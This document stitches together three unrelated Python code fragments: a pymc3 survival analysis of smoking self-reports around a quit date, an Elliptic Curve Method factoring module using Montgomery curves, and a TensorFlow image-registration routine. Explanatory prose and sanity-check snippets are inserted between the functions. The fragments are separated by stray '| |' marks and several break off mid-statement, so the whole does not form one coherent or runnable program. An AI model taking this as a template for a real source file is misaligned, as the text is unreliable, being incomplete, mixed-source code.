data_selfreport["is_post_quit"] = data_selfreport["day_since_quit"].apply(lambda x: 0 if x < 0 else 1)
# Create a new variable, day_within_period:
# if is_post_quit<0, number of days after 12AM on start of study
# if is_post_quit>=0, number of days after 12AM on Quit Date
# hence day_within_period is a count variable with ZERO as minimum value
data_selfreport["day_within_period"] = np.where(data_selfreport["is_post_quit"]==0,
data_selfreport["study_day"],
data_selfreport["day_since_quit"])
# Number of hours elapsed since the beginning of the study
data_selfreport['hours_since_start'] = (data_selfreport['date'] - data_selfreport['start_date'])/np.timedelta64(1,'h')
#%%
# Get number of hours elapsed between two self-reported smoking events
data_selfreport['actual_end_date_hrts'] = pd.to_datetime(data_selfreport['actual_end_date_hrts'])
data_selfreport['time_to_quit'] = (data_selfreport.actual_end_date_hrts - data_selfreport.date) / np.timedelta64(1,'m') + 720 # Add 720 minutes so data provided on the quit date itself is still counted
data_selfreport = data_selfreport.sort_values(['participant_id','date'])
data_selfreport['time_to_next_event'] = data_selfreport.groupby("participant_id").date.diff().shift(-1)/np.timedelta64(1,'m')
#%%
# For NaN, time_to_next_event is the time until actual quit date.
# These should be treated as censored times
data_selfreport["censored"] = data_selfreport["time_to_next_event"].isnull()
mask = data_selfreport['censored']
data_selfreport.loc[mask, 'time_to_next_event'] = data_selfreport.loc[mask, 'time_to_quit']
#%%
# Finally, select subset of columns
use_these_columns = ["participant_id",
"start_date_hrts", "quit_date_hrts",
"expected_end_date_hrts","actual_end_date_hrts",
"is_post_quit", "study_day", "day_since_quit", "day_within_period",
"message", "delta", "time_to_next_event","censored"]
data_selfreport = data_selfreport.loc[:, use_these_columns]
#%%
###############################################################################
# Data preparation: Create data to be used as input to pymc3
###############################################################################
# Collect data to be used in analyses in a dictionary
collect_data_analysis = {}
collect_data_analysis['df_datapoints'] = (
data_selfreport
.loc[:,["participant_id", "is_post_quit", "time_to_next_event","censored",
"day_within_period", "delta"]]
)
#%%
# collect_results is a dictionary that will collect results across all models
collect_results={}
#%%
###############################################################################
# Estimation using pymc3
###############################################################################
use_this_data = collect_data_analysis['df_datapoints']
def exponential_log_complementary_cdf(x, lam):
''' log complementary CDF of exponential distribution '''
return -lam*x
def exponential_log_pdf(x, lam):
''' log PDF of exponential distribution '''
return np.log(lam)-lam*x
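As a sanity check, the two exponential helpers above can be compared against scipy's exponential distribution (a rate lam corresponds to scale = 1/lam):

```python
import numpy as np
from scipy import stats

lam, x = 0.3, 2.5
# log survival function: log P(X > x) = -lam * x
assert np.isclose(-lam * x, stats.expon.logsf(x, scale=1/lam))
# log density: log(lam) - lam * x
assert np.isclose(np.log(lam) - lam * x, stats.expon.logpdf(x, scale=1/lam))
```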
def convert_windowtag(windowtag):
if windowtag == 1:
window_max = 5; window_min = 0
elif windowtag == 2:
window_max = 15; window_min = 5
elif windowtag == 3:
window_max = 30; window_min = 15
else:
window_max = 60; window_min = 30
return window_min, window_max
def normal_cdf(x, mu=0, sd=1):
'''Use theano to compute cdf'''
z = (x-mu)/sd
return (tt.erf(z/np.sqrt(2))+1)/2
def selfreport_mem(x, t, winmin, winmax):
''' Measurement model for self-report '''
gap = t - x
mem_scale = 10
upper = normal_cdf(winmax, mu = gap, sd = mem_scale)
lower = normal_cdf(winmin, mu = gap, sd = mem_scale)
return tt.log(upper-lower)
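For intuition, here is a NumPy/SciPy analogue of selfreport_mem (assumed equivalent to the theano version above, which must stay in theano so pymc3 can differentiate through it). It returns the log-probability that the recalled gap t - x lands inside the reported window [winmin, winmax] under a Normal recall error with sd = 10 minutes:

```python
import numpy as np
from scipy.stats import norm

def selfreport_mem_np(x, t, winmin, winmax, mem_scale=10.0):
    # Probability mass that the Normal(gap, mem_scale) recall error
    # assigns to the reported window, on the log scale
    gap = t - x
    upper = norm.cdf(winmax, loc=gap, scale=mem_scale)
    lower = norm.cdf(winmin, loc=gap, scale=mem_scale)
    return np.log(upper - lower)

# Example: true event 3 minutes before the report,
# reported window "less than 5 minutes ago" = [0, 5]
ll = selfreport_mem_np(x=0.0, t=3.0, winmin=0.0, winmax=5.0)
assert np.isfinite(ll) and ll < 0  # a log-probability, so negative
```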
censored = use_this_data['censored'].values.astype(bool)
time_to_next_event = use_this_data['time_to_next_event'].values.astype(float)
day_within_period = use_this_data['day_within_period'].values.astype(float)
is_post_quit = use_this_data['is_post_quit'].values.astype(float)
windowtag = use_this_data['delta'].values.astype(float)
temp = np.array(list(map(convert_windowtag,windowtag)))
windowmin = temp[:,0]
windowmax = temp[:,1]
midpoint = (windowmin+windowmax)/2
test_obs = time_to_next_event-midpoint
test_obs[test_obs <= 0] = 1.
negativetimes = time_to_next_event <= 1
remove_obs = censored | negativetimes
num_ok = time_to_next_event[~remove_obs].size
test_obs1 = test_obs[~remove_obs]
time_to_next_event1 = time_to_next_event[~remove_obs]
windowmin1=windowmin[~remove_obs]
windowmax1=windowmax[~remove_obs]
day_within_period1=day_within_period[~remove_obs]
is_post_quit1 = is_post_quit[~remove_obs]
#%%
with pm.Model() as model:
# -------------------------------------------------------------------------
# Priors
# -------------------------------------------------------------------------
beta = pm.Normal('beta', mu=0, sd=10)
beta_day = pm.Normal('beta_day', mu=0, sd=10)
# -------------------------------------------------------------------------
# Likelihood
# -------------------------------------------------------------------------
loglamb_observed = beta + beta_day*day_within_period1
lamb_observed = pm.math.exp(loglamb_observed) # pm.math.exp keeps the transform inside the theano graph
# Y_hat_observed = pm.Exponential('Y_hat_observed', lam = lamb_observed, observed = time_to_next_event[~censored])
Y_latent = pm.Exponential('Y_latent', lam = lamb_observed, shape=len(test_obs1), testval=test_obs1)
Y_observed = pm.Potential('Y_observed', selfreport_mem(Y_latent, time_to_next_event1, windowmin1, windowmax1))
loglamb_censored = beta + beta_day*day_within_period[censored] # Switched model to 1 parameter for both censored/uncensored (makes sense if final obs is "real")
lamb_censored = pm.math.exp(loglamb_censored)
Y_hat_censored = pm.Potential('Y_hat_censored', exponential_log_complementary_cdf(x = time_to_next_event[censored], lam = lamb_censored))
#%%
# Sample from posterior distribution
with model:
# posterior_samples = pm.sample(draws=3000, tune=2000, cores=1, target_accept=0.80)
posterior_samples = pm.sample(draws = 3000, tune=2000, init='adapt_diag', cores = 1)
#%%
# Calculate 95% credible interval
model_summary_logscale = az.summary(posterior_samples, credible_interval=.95)
model_summary_logscale = model_summary_logscale[['mean','hpd_2.5%','hpd_97.5%']]
# Produce trace plots
pm.traceplot(posterior_samples, var_names = ['beta', 'beta_day', 'Y_latent'])
# Collect results
collect_results['0'] = {'model':model,
'posterior_samples':posterior_samples,
'model_summary_logscale':model_summary_logscale}
#%%
# Remove variable from workspace
del model, posterior_samples, model_summary_logscale
#%%
###############################################################################
# Estimation using pymc3; pre-/post- quit split.
###############################################################################
with pm.Model() as model:
# -------------------------------------------------------------------------
# Priors
# -------------------------------------------------------------------------
beta_prequit = pm.Normal('beta_prequit', mu=0, sd=10)
beta_postquit = pm.Normal('beta_postquit', mu=0, sd=10)
beta_prequit_day = pm.Normal('beta_prequit_day', mu=0, sd=10)
beta_postquit_day = pm.Normal('beta_postquit_day', mu=0, sd=10)
# alpha = pm.Normal('alpha', mu=0, sd=10)
# -------------------------------------------------------------------------
# Likelihood
# -------------------------------------------------------------------------
loglamb_observed = beta_prequit*(1-is_post_quit1) + beta_prequit_day*day_within_period1*(1-is_post_quit1) + beta_postquit*is_post_quit1 + beta_postquit_day*day_within_period1*is_post_quit1
lamb_observed = pm.math.exp(loglamb_observed)
Y_hat_observed = pm.Exponential('Y_hat_observed', lam = lamb_observed, observed=time_to_next_event1)
loglamb_censored = beta_prequit*(1-is_post_quit[censored]) + beta_prequit_day*day_within_period[censored]*(1-is_post_quit[censored]) + beta_postquit*is_post_quit[censored] + beta_postquit_day*day_within_period[censored]*is_post_quit[censored] # Model if no dropout
# loglamb_censored = alpha # Model if final window is drop-out
lamb_censored = pm.math.exp(loglamb_censored)
Y_hat_censored = pm.Potential('Y_hat_censored', exponential_log_complementary_cdf(x = time_to_next_event[censored], lam = lamb_censored))
#%%
# Sample from posterior distribution
with model:
# posterior_samples = pm.sample(draws=3000, tune=2000, cores=1, target_accept=0.80)
posterior_samples = pm.sample(draws = 3000, tune=2000, init='adapt_diag', cores = 1)
#%%
# Calculate 95% credible interval
model_summary_logscale = az.summary(posterior_samples, credible_interval=.95)
model_summary_logscale = model_summary_logscale[['mean','hpd_2.5%','hpd_97.5%']]
# Produce trace plots
pm.traceplot(posterior_samples, var_names = ['beta_prequit', 'beta_prequit_day' , 'beta_postquit', 'beta_postquit_day'])
# Collect results
collect_results['1'] = {'model':model,
'posterior_samples':posterior_samples,
'model_summary_logscale':model_summary_logscale}
#%%
# Remove variable from workspace
del model, posterior_samples, model_summary_logscale
#%%
###############################################################################
# Estimation using pymc3; pre-/post- quit split with participant-level random effects.
###############################################################################
# Create new participant id's
participant_names = use_this_data['participant_id'].unique()
n_participants = len(participant_names)
d = {'participant_id':participant_names, 'participant_idx':np.array(range(0,n_participants))}
reference_df = pd.DataFrame(d)
use_this_data = use_this_data.merge(reference_df, how = 'left', on = 'participant_id')
participant_idx = use_this_data['participant_idx'].values
#%%
with pm.Model() as model:
# -------------------------------------------------------------------------
# Priors
# -------------------------------------------------------------------------
beta_prequit = pm.Normal('beta_prequit', mu=0, sd=10)
beta_postquit = pm.Normal('beta_postquit', mu=0, sd=10)
beta_prequit_day = pm.Normal('beta_prequit_day', mu=0, sd=10)
beta_postquit_day = pm.Normal('beta_postquit_day', mu=0, sd=10)
gamma_prequit = pm.Normal('gamma_prequit', mu=0, sd=10, shape=n_participants)
gamma_postquit = pm.Normal('gamma_postquit', mu=0, sd=10, shape=n_participants)
# alpha = pm.Normal('alpha', mu=0, sd=10)
# -------------------------------------------------------------------------
# Likelihood
# -------------------------------------------------------------------------
loglamb_observed = (beta_prequit + gamma_prequit[participant_idx][~remove_obs])*(1-is_post_quit1) + beta_prequit_day*day_within_period1*(1-is_post_quit1) + (beta_postquit + gamma_postquit[participant_idx][~remove_obs])*is_post_quit1 + beta_postquit_day*day_within_period1*is_post_quit1
lamb_observed = pm.math.exp(loglamb_observed)
Y_hat_observed = pm.Exponential('Y_hat_observed', lam = lamb_observed, observed=time_to_next_event1)
# loglamb_censored = alpha
loglamb_censored = (beta_prequit + gamma_prequit[participant_idx][censored])*(1-is_post_quit[censored]) + beta_prequit_day*day_within_period[censored]*(1-is_post_quit[censored]) + (beta_postquit + gamma_postquit[participant_idx][censored])*is_post_quit[censored] + beta_postquit_day*day_within_period[censored]*is_post_quit[censored]
lamb_censored = pm.math.exp(loglamb_censored)
Y_hat_censored = pm.Potential('Y_hat_censored', exponential_log_complementary_cdf(x = time_to_next_event[censored], lam = lamb_censored))
#%%
# Sample from posterior distribution
with model:
# posterior_samples = pm.sample(draws=5000, tune=5000, cores=1, target_accept=0.80)
posterior_samples = pm.sample(draws = 3000, tune=2000, init='adapt_diag', cores = 1)
#%%
# Calculate 95% credible interval
model_summary_logscale = az.summary(posterior_samples, credible_interval=.95)
model_summary_logscale = model_summary_logscale[['mean','hpd_2.5%','hpd_97.5%']]
# Produce trace plots
pm.traceplot(posterior_samples)
# Collect results
collect_results['2'] = {'model':model,
'posterior_samples':posterior_samples,
'model_summary_logscale':model_summary_logscale}
#%%
# Remove variable from workspace
del model, posterior_samples, model_summary_logscale
#%%
###############################################################################
# Print results from all models
###############################################################################
import matplotlib.pyplot as plt
# Model 0
pm.traceplot(collect_results['0']['posterior_samples'])
print(collect_results['0']['model_summary_logscale'])
plt.figure(figsize=(4,8))
pm.forestplot(collect_results['0']['posterior_samples'], var_names=['beta'], credible_interval=0.95)
pm.forestplot(collect_results['0']['posterior_samples'], var_names=['beta_day'], credible_interval=0.95)
#pm.forestplot(collect_results['0']['posterior_samples'], var_names=['alpha'], credible_interval=0.95)
# Model 1
pm.traceplot(collect_results['1']['posterior_samples'])
print(collect_results['1']['model_summary_logscale'])
plt.figure(figsize=(4,8))
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_prequit'], credible_interval=0.95)
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_prequit_day'], credible_interval=0.95)
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_postquit'], credible_interval=0.95)
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_postquit_day'], credible_interval=0.95)
#pm.forestplot(collect_results['1']['posterior_samples'], var_names=['alpha'], credible_interval=0.95)
# Model 2
pm.traceplot(collect_results['2']['posterior_samples'])
print(collect_results['2']['model_summary_logscale'])
plt.figure(figsize=(4,8))
pm.forestplot(collect_results['2']['posterior_samples'], var_names=['beta_prequit'], | |
"""Elliptic Curve Method using Montgomery Curves.
"""
import random
import time
from math import gcd
import numpy as np
from wheel_sieve.common import (
PRIME_GEN,
InverseNotFound,
CurveInitFail,
inv,
init_wheel,
)
def get_curve_suyama(sigma, n):
"""Given parameter sigma, generate an Elliptic Curve (mod n) and a point on it using
Suyama's parametrization.
The constructed curve's group order is a multiple of 12, compared to 4 guaranteed for
Montgomery Curves.
Args:
sigma (int): The sigma parameter.
n (int): Modulus.
Raises:
CurveInitFail: Thrown when the curve generated by the given parameters fails the
necessary conditions.
Returns:
tuple(tuple(int, int), tuple(int, int, int)): (Point, Curve), where
- Point = (x0, z0) in projective coordinates ignoring y.
- Curve = (A, s, n),
representing B * (y/z) ** 2 == (x/z) ** 3 + A * (x/z) ** 2 + (x/z) (mod n),
ignoring B and y.
- s = (A+2)/4 % n is precomputed for point doubling.
"""
if sigma % n in (n - 5, n - 3, n - 1, 0, 1, 3, 5) or sigma * 3 % n in (n - 5, 5):
raise CurveInitFail()
u = (sigma ** 2 - 5) % n  # parenthesized: % binds tighter than -
v = 4 * sigma % n
x0 = u ** 3 % n
z0 = v ** 3 % n
A = ((v - u) ** 3 * (3 * u + v) * inv(4 * u ** 3 * v, n) - 2) % n
if A in (n - 2, 2):
raise CurveInitFail()
s = (A + 2) * inv(4, n) % n
# For completeness...
# B = u * inv(z0, n) % n
# y = (sigma ** 2 - 1) * (sigma ** 2 - 25) * (sigma ** 4 - 25) % n
# x0_norm = (x0 * inv(z0, n)) % n
# y0_norm = (y * inv(z0, n)) % n
# assert B * y0_norm ** 2 % n == (x0_norm ** 3 + A * x0_norm ** 2 + x0_norm) % n
return (x0, z0), (A, s, n)
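The commented-out "for completeness" block above hints at a full consistency check of Suyama's parametrization. A standalone version over a small prime modulus, so that every inverse exists (modular inverses via `pow(x, -1, n)`, Python 3.8+; the sample `sigma` values are arbitrary):

```python
def suyama_check(sigma, n):
    # Rebuild the curve plus the omitted B and y, then verify
    # B*y**2 == x**3 + A*x**2 + x (mod n) in normalized coordinates.
    u = (sigma ** 2 - 5) % n
    v = 4 * sigma % n
    x0, z0 = u ** 3 % n, v ** 3 % n
    A = ((v - u) ** 3 * (3 * u + v) * pow(4 * u ** 3 * v, -1, n) - 2) % n
    B = u * pow(z0, -1, n) % n
    y = (sigma ** 2 - 1) * (sigma ** 2 - 25) * (sigma ** 4 - 25) % n
    x_norm = x0 * pow(z0, -1, n) % n
    y_norm = y * pow(z0, -1, n) % n
    return B * y_norm ** 2 % n == (x_norm ** 3 + A * x_norm ** 2 + x_norm) % n
```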
def get_curve_a(x, A, n):
"""Given parameters x and A, generate an Elliptic Curve (mod n) and a point on it.
Args:
x (int): Desired x coordinate of the point.
A (int): Parameter A of Montgomery Curve.
n (int): Modulus.
Raises:
CurveInitFail: Thrown when the curve generated by the given parameters fails the
necessary conditions.
Returns:
tuple(tuple(int, int), tuple(int, int, int)): (Point, Curve), where
- Point = (x0, z0) in projective coordinates ignoring y.
- Curve = (A, s, n),
representing B * (y/z) ** 2 == (x/z) ** 3 + A * (x/z) ** 2 + (x/z) (mod n),
ignoring B and y.
- s = (A+2)/4 % n is precomputed for point doubling.
"""
if A % n in (n - 2, 2):
raise CurveInitFail()
x0 = x % n
z0 = 1
s = (A + 2) * inv(4, n) % n
# For completeness...
# x0_norm = x0
# y0_norm = 2
# B = (x0_norm ** 3 + A * x0_norm ** 2 + x0_norm) * inv(y0_norm ** 2, n) % n
# assert B * y0_norm ** 2 % n == (x0_norm ** 3 + A * x0_norm ** 2 + x0_norm) % n
return (x0, z0), (A, s, n)
def add_pt(ptp, ptq, pt_, curve):
"""Computes point P+Q given points P, Q and P-Q, and curve.
Does not return correct result when P == Q, use dbl_pt instead.
Args:
ptp (tuple(int, int)): Point P.
ptq (tuple(int, int)): Point Q.
pt_ (tuple(int, int)): Point P-Q.
curve (tuple(int, int, int)): Curve.
Returns:
tuple(int, int): Point P+Q.
"""
xp, zp = ptp
xq, zq = ptq
x_, z_ = pt_
_A, _s, n = curve
u = (xp - zp) * (xq + zq) % n
v = (xp + zp) * (xq - zq) % n
xr = z_ * ((u + v) ** 2 % n) % n
zr = x_ * ((u - v) ** 2 % n) % n
return (xr, zr)
def to_weierstrass(pt, curve):
"""Given a point P and an Montgomery Curve it is on, computes the equivalent point and curve
in weierstrass form.
Note: Multiple calls for same curve with different P will produce different output curves.
This is due to y-coordinates being omitted in the representation. Without the ability to
square-root y (mod n) by fixing B, the natural thing to do is to fix y and calculate B.
So different point P produces different B.
Args:
pt (tuple(int, int)): Point P in XZ form.
curve (tuple(int, int, int)): Curve in Montgomery form.
Returns:
tuple(tuple(int, int), tuple(int, int, int)): (Point, Curve), where
- Point = (t, v) in XY form.
- Curve = (a, b, n) representing the Elliptic Curve y**2 = x**3 + a*x + b (mod n).
"""
x, z = pt
A, _s, n = curve
y_norm = 1
x_norm = x * inv(z, n)
B = (x_norm ** 3 + A * x_norm ** 2 + x_norm) % n
assert B * y_norm ** 2 % n == (x_norm ** 3 + A * x_norm ** 2 + x_norm) % n
B_inv = inv(B, n)
three_inv = inv(3, n)
t = (x_norm * B_inv + A * three_inv * B_inv) % n
v = (y_norm * B_inv) % n
a = (3 - A ** 2) * three_inv * B_inv * B_inv % n
b = (2 * A ** 3 - 9 * A) * (three_inv * B_inv % n) ** 3 % n
assert v ** 2 % n == (t ** 3 + a * t + b) % n
return (t, v), (a, b, n)
def add_pt_exn(ptp, ptq, pt_, curve):
"""Computes point P+Q given points P, Q and P-Q, and curve.
Does not return correct result when P == Q, use dbl_pt instead.
Args:
ptp (tuple(int, int)): Point P.
ptq (tuple(int, int)): Point Q.
pt_ (tuple(int, int)): Point P-Q.
curve (tuple(int, int, int)): Curve.
Raises:
InverseNotFound: Thrown when point P+Q is the point at infinity.
Returns:
tuple(int, int): Point P+Q.
"""
return check(add_pt(ptp, ptq, pt_, curve), curve)
def dbl_pt(pt, curve):
"""Computes point 2P given point P and curve.
Args:
pt (tuple(int, int)): Point P.
curve (tuple(int, int, int)): Curve.
Returns:
tuple(int, int): Point 2P.
"""
x, z = pt
_A, s, n = curve
a = (x + z) ** 2 % n
b = (x - z) ** 2 % n
t = a - b
xr = a * b % n
zr = t * ((b + s * t) % n) % n
return (xr, zr)
def mul_pt_exn(pt, curve, k):
"""Computes point kP given point P, curve and k using Montgomery Ladder.
Args:
pt (tuple(int, int)): Point P.
curve (tuple(int, int, int)): Curve.
k (int): Multiplier.
Raises:
InverseNotFound: Thrown when point kP is the point at infinity.
Returns:
tuple(int, int): Point kP.
"""
if k <= 2:
if k < 0:
# x and z coordinates are the same for P and -P.
return mul_pt_exn(pt, curve, -k)
if k == 0:
# InverseNotFound will be thrown
return check((0, 0), curve)
if k == 1:
return check(pt, curve)
return check(dbl_pt(pt, curve), curve)
res0 = pt
res1 = dbl_pt(pt, curve)
j = k.bit_length() - 2
while j >= 1:
if (k >> j) % 2 == 1:
res0 = add_pt(res1, res0, pt, curve)
res1 = dbl_pt(res1, curve)
else:
res1 = add_pt(res1, res0, pt, curve)
res0 = dbl_pt(res0, curve)
j -= 1
if k % 2 == 1:
res0 = add_pt(res1, res0, pt, curve)
else:
res0 = dbl_pt(res0, curve)
return check(res0, curve)
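A self-contained consistency check of the XZ-only ladder logic above (minimal re-implementations of the doubling, differential-addition, and ladder steps; the curve parameter `A = 7`, the toy composite `n = 91`, and the start point are arbitrary illustrative choices, not values used by the module). In ECM proper, a factor of `n` is revealed when the `z`-coordinate of the resulting point shares a nontrivial gcd with `n`:

```python
from math import gcd

def dbl(pt, s, n):
    x, z = pt
    a, b = (x + z) ** 2 % n, (x - z) ** 2 % n
    t = a - b
    return a * b % n, t * ((b + s * t) % n) % n

def diff_add(p, q, d, n):
    # differential addition: P+Q from P, Q and the known difference D = P-Q
    u = (p[0] - p[1]) * (q[0] + q[1]) % n
    v = (p[0] + p[1]) * (q[0] - q[1]) % n
    return d[1] * ((u + v) ** 2 % n) % n, d[0] * ((u - v) ** 2 % n) % n

def ladder(pt, k, s, n):
    # Montgomery ladder; invariant: r1 - r0 == P throughout the loop
    r0, r1 = pt, dbl(pt, s, n)
    for j in range(k.bit_length() - 2, -1, -1):
        if (k >> j) & 1:
            r0, r1 = diff_add(r0, r1, pt, n), dbl(r1, s, n)
        else:
            r0, r1 = dbl(r0, s, n), diff_add(r0, r1, pt, n)
    return r0

n, A = 91, 7                      # 91 = 7 * 13, toy composite
s = (A + 2) * pow(4, -1, n) % n   # s = (A+2)/4, as in the curve tuple above
P = (2, 1)
g = gcd(ladder(P, 2 ** 3 * 3 ** 2 * 5 * 7, s, n)[1], n)  # ECM stage-1 flavor
```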
def check(pt, curve):
"""Given point P (x, z), check that P is not the point at infinity, i.e. gcd(z, n) == 1,
and return P.
Args:
pt (tuple(int, int)): Point P.
curve (tuple(int, int, int)): Curve.
Raises:
| |
tf.convert_to_tensor(params['A0'], dtype=dtype)
# cost function parameters
sigmaM = params['sigmaM'] # matching
sigmaM2 = sigmaM**2
sigmaR = params['sigmaR'] # regularization
sigmaR2 = sigmaR**2
sigmaA = params['sigmaA'] # artifact
sigmaA2 = sigmaA**2
# optimization parameters
niter = params['niter'] # gradient descent iterations
naffine = params['naffine'] # gradient descent iterations of affine only
if nt == 0: # only do affine
naffine = niter+1
nMstep = params['nMstep'] # number of M steps per E step in EM algorithm for artifacts
nMstep_affine = params['nMstep_affine'] # number of M steps per E step in EM algorithm for artifacts during affine only phase
eV = params['eV'] # step size for deformation parameters
eL = params['eL'] # step size for linear part of affine
eT = params['eT'] # step size for translation part of affine
post_affine_reduce = params['post_affine_reduce'] # reduce affine step sizes by this much once nonrigid starts
# Get initial guess for deformation and resample if necessary
# initial velocity, I need the nT in order to do this
params['vt00'] = np.zeros((I.shape[0],I.shape[1],I.shape[2],nt),dtype=np.float32)
params['vt10'] = np.zeros((I.shape[0],I.shape[1],I.shape[2],nt),dtype=np.float32)
params['vt20'] = np.zeros((I.shape[0],I.shape[1],I.shape[2],nt),dtype=np.float32)
params.update(kwargs)
vt00 = params['vt00'].astype(np.float32)
vt10 = params['vt10'].astype(np.float32)
vt20 = params['vt20'].astype(np.float32)
nt_check = vt00.shape[-1]
if nt_check != nt:
raise ValueError('input velocity field should be the same number of timesteps as nt parameter')
n0_check = vt00.shape[0]
n1_check = vt00.shape[1]
n2_check = vt00.shape[2]
if n0_check != nxI[0] or n1_check != nxI[1] or n2_check != nxI[2]:
warnings.warn('upsampling initial guess of velocity field')
shape = np.array([I.shape[0],I.shape[1],I.shape[2],nt])
vt00_ = vt00
vt10_ = vt10
vt20_ = vt20
vt00 = np.zeros(shape)
vt10 = np.zeros(shape)
vt20 = np.zeros(shape)
for t in range(nt):
print('Upsampling velocity time {} of {}'.format(t,nt))
vt00[:,:,:,t] = upsample(vt00_[:,:,:,t],shape[:3])
vt10[:,:,:,t] = upsample(vt10_[:,:,:,t],shape[:3])
vt20[:,:,:,t] = upsample(vt20_[:,:,:,t],shape[:3])
vt00 = vt00.astype(np.float32)
vt10 = vt10.astype(np.float32)
vt20 = vt20.astype(np.float32)
# gradient descent step sizes set as placeholders
eV_ph = tf.placeholder(dtype=dtype)
eL_ph = tf.placeholder(dtype=dtype)
eT_ph = tf.placeholder(dtype=dtype)
if verbose: print('Got parameters')
################################################################################
# some initializations
CA = params['CA0'] # constant value for "artifact image"
I = tf.convert_to_tensor(I, dtype=dtype)
J = tf.convert_to_tensor(J, dtype=dtype)
W = tf.convert_to_tensor(params['W'], dtype=dtype)
# build kernels for enforcing smoothness
f0I = np.arange(nxI[0])/dxI[0]/nxI[0]
f1I = np.arange(nxI[1])/dxI[1]/nxI[1]
f2I = np.arange(nxI[2])/dxI[2]/nxI[2]
F0I,F1I,F2I = np.meshgrid(f0I, f1I, f2I, indexing='ij')
# identity minus laplacian (raised to the power p), in fourier domain
# 2D stencil shown for reference; the code applies the analogous stencil along all three axes:
# AI[i,j] = I[i,j] - alpha^2( (I[i+1,j] - 2I[i,j] + I[i-1,j])/dx^2 + (I[i,j+1] - 2I[i,j] + I[i,j-1])/dy^2 )
Lhat = (1.0 - a**2*( (-2.0 + 2.0*np.cos(2.0*np.pi*dxI[0]*F0I))/dxI[0]**2
+ (-2.0 + 2.0*np.cos(2.0*np.pi*dxI[1]*F1I))/dxI[1]**2
+ (-2.0 + 2.0*np.cos(2.0*np.pi*dxI[2]*F2I))/dxI[2]**2 ) )**p
LLhat = Lhat**2
Khat = 1.0/LLhat
K = np.real(np.fft.ifftn(Khat))
Khattf = tf.complex(tf.constant(Khat,dtype=dtype),tf.zeros((1),dtype=dtype)) # this should be complex because it multiplies other complex things to do smoothing
LLhattf = tf.constant(LLhat,dtype=dtype) # this should be real because it multiplies real things to compute energy
f = plt.figure()
vis.imshow_slices(np.fft.ifftshift(K),x=xI,fig=f)
f.suptitle('Smoothing kernel')
f.canvas.draw()
if verbose: print('Built energy operators')
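A 1-D sanity check of the Fourier construction above (toy sizes are assumed): the multiplier `1 - a**2 * (-2 + 2*cos(2*pi*dx*f)) / dx**2` is exactly the symbol of the periodic second-difference operator, so applying it in the Fourier domain matches applying the stencil directly.

```python
import numpy as np

n, dx, a = 64, 0.5, 2.0
f = np.arange(n) / dx / n
symbol = (-2.0 + 2.0 * np.cos(2.0 * np.pi * dx * f)) / dx ** 2
Lhat1d = 1.0 - a ** 2 * symbol          # the p = 1 case of the operator above

rng = np.random.default_rng(0)
u = rng.standard_normal(n)
via_fft = np.real(np.fft.ifft(Lhat1d * np.fft.fft(u)))
lap = (np.roll(u, -1) - 2.0 * u + np.roll(u, 1)) / dx ** 2   # periodic stencil
direct = u - a ** 2 * lap
```

Because the discrete Laplacian symbol is nonpositive, `Lhat1d >= 1` everywhere, so the inverse kernel `1 / Lhat1d**2` is well defined, which is why the 3-D code can divide by `LLhat` safely.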
# initialize tensorflow variables that will be optimized
# we need an "old" and a "new" version for our iterative algorithm
with tf.variable_scope("", reuse=tf.AUTO_REUSE):
A = tf.get_variable('A', dtype=dtype, trainable=False, initializer=A0)
Anew = tf.get_variable('Anew', dtype=dtype, trainable=False, initializer=A0)
vt0 = tf.get_variable('vt0', dtype=dtype, trainable=False, initializer=vt00)
vt1 = tf.get_variable('vt1', dtype=dtype, trainable=False, initializer=vt10)
vt2 = tf.get_variable('vt2', dtype=dtype, trainable=False, initializer=vt20)
vt0new = tf.get_variable('vt0new', dtype=dtype, trainable=False, initializer=vt00)
vt1new = tf.get_variable('vt1new', dtype=dtype, trainable=False, initializer=vt10)
vt2new = tf.get_variable('vt2new', dtype=dtype, trainable=False, initializer=vt20)
# build initial weights WM (matching) and WA (artifact)
# if not using weights just use 1 and 0
npones = np.ones(nxJ)
if nMstep>0:
WM0 = tf.convert_to_tensor(npones*0.9, dtype=dtype)
WA0 = tf.convert_to_tensor(npones*0.1, dtype=dtype)
else:
WM0 = tf.convert_to_tensor(npones, dtype=dtype)
WA0 = tf.convert_to_tensor(npones*0.0, dtype=dtype)
WM = tf.get_variable('WM', dtype=dtype, trainable=False, initializer=WM0)
WA = tf.get_variable('WA', dtype=dtype, trainable=False, initializer=WA0)
WMnew = tf.get_variable('WMnew', dtype=dtype, trainable=False, initializer=WM0)
WAnew = tf.get_variable('WAnew', dtype=dtype, trainable=False, initializer=WA0)
if verbose: print('Built tensorflow variables')
################################################################
# define gradient calculations and updates in tensorflow graph
# initialize time dependent flow
It = [I]
phiinv0 = tf.convert_to_tensor(X0I, dtype=dtype) # make sure these are tensors
phiinv1 = tf.convert_to_tensor(X1I, dtype=dtype)
phiinv2 = tf.convert_to_tensor(X2I, dtype=dtype)
ERt = []
for t in range(nt):
# slice the velocity for convenience
v0 = vt0[:,:,:,t]
v1 = vt1[:,:,:,t]
v2 = vt2[:,:,:,t]
# points to sample at for updating diffeomorphisms
X0s = X0I - v0*dt
X1s = X1I - v1*dt
X2s = X2I - v2*dt
# update diffeomorphism with nice boundary conditions
phiinv0 = interp3(x0I, x1I, x2I, phiinv0-X0I, X0s, X1s, X2s) + X0s
phiinv1 = interp3(x0I, x1I, x2I, phiinv1-X1I, X0s, X1s, X2s) + X1s
phiinv2 = interp3(x0I, x1I, x2I, phiinv2-X2I, X0s, X1s, X2s) + X2s
# deform the image, I will need this for image gradient computations
It.append(interp3(x0I, x1I, x2I, I, phiinv0, phiinv1, phiinv2))
# take the Fourier transform, for computing energy directly in Fourier domain
# note the normalizer 1/(number of elements)
v0hat = tf.fft3d(tf.complex(v0, 0.0))
v1hat = tf.fft3d(tf.complex(v1, 0.0))
v2hat = tf.fft3d(tf.complex(v2, 0.0))
# I changed this to reduce mean and float64 to improve numerical precision
ER_ = tf.reduce_mean(tf.cast( ( tf.pow(tf.abs(v0hat),2)
+ tf.pow(tf.abs(v1hat),2)
+ tf.pow(tf.abs(v2hat),2) ) * LLhattf , dtype=tf.float64) )
ERt.append(ER_)
# now apply affine tranform
B = tf.linalg.inv(A)
X0s = B[0,0]*X0J + B[0,1]*X1J + B[0,2]*X2J + B[0,3]
X1s = B[1,0]*X0J + B[1,1]*X1J + B[1,2]*X2J + B[1,3]
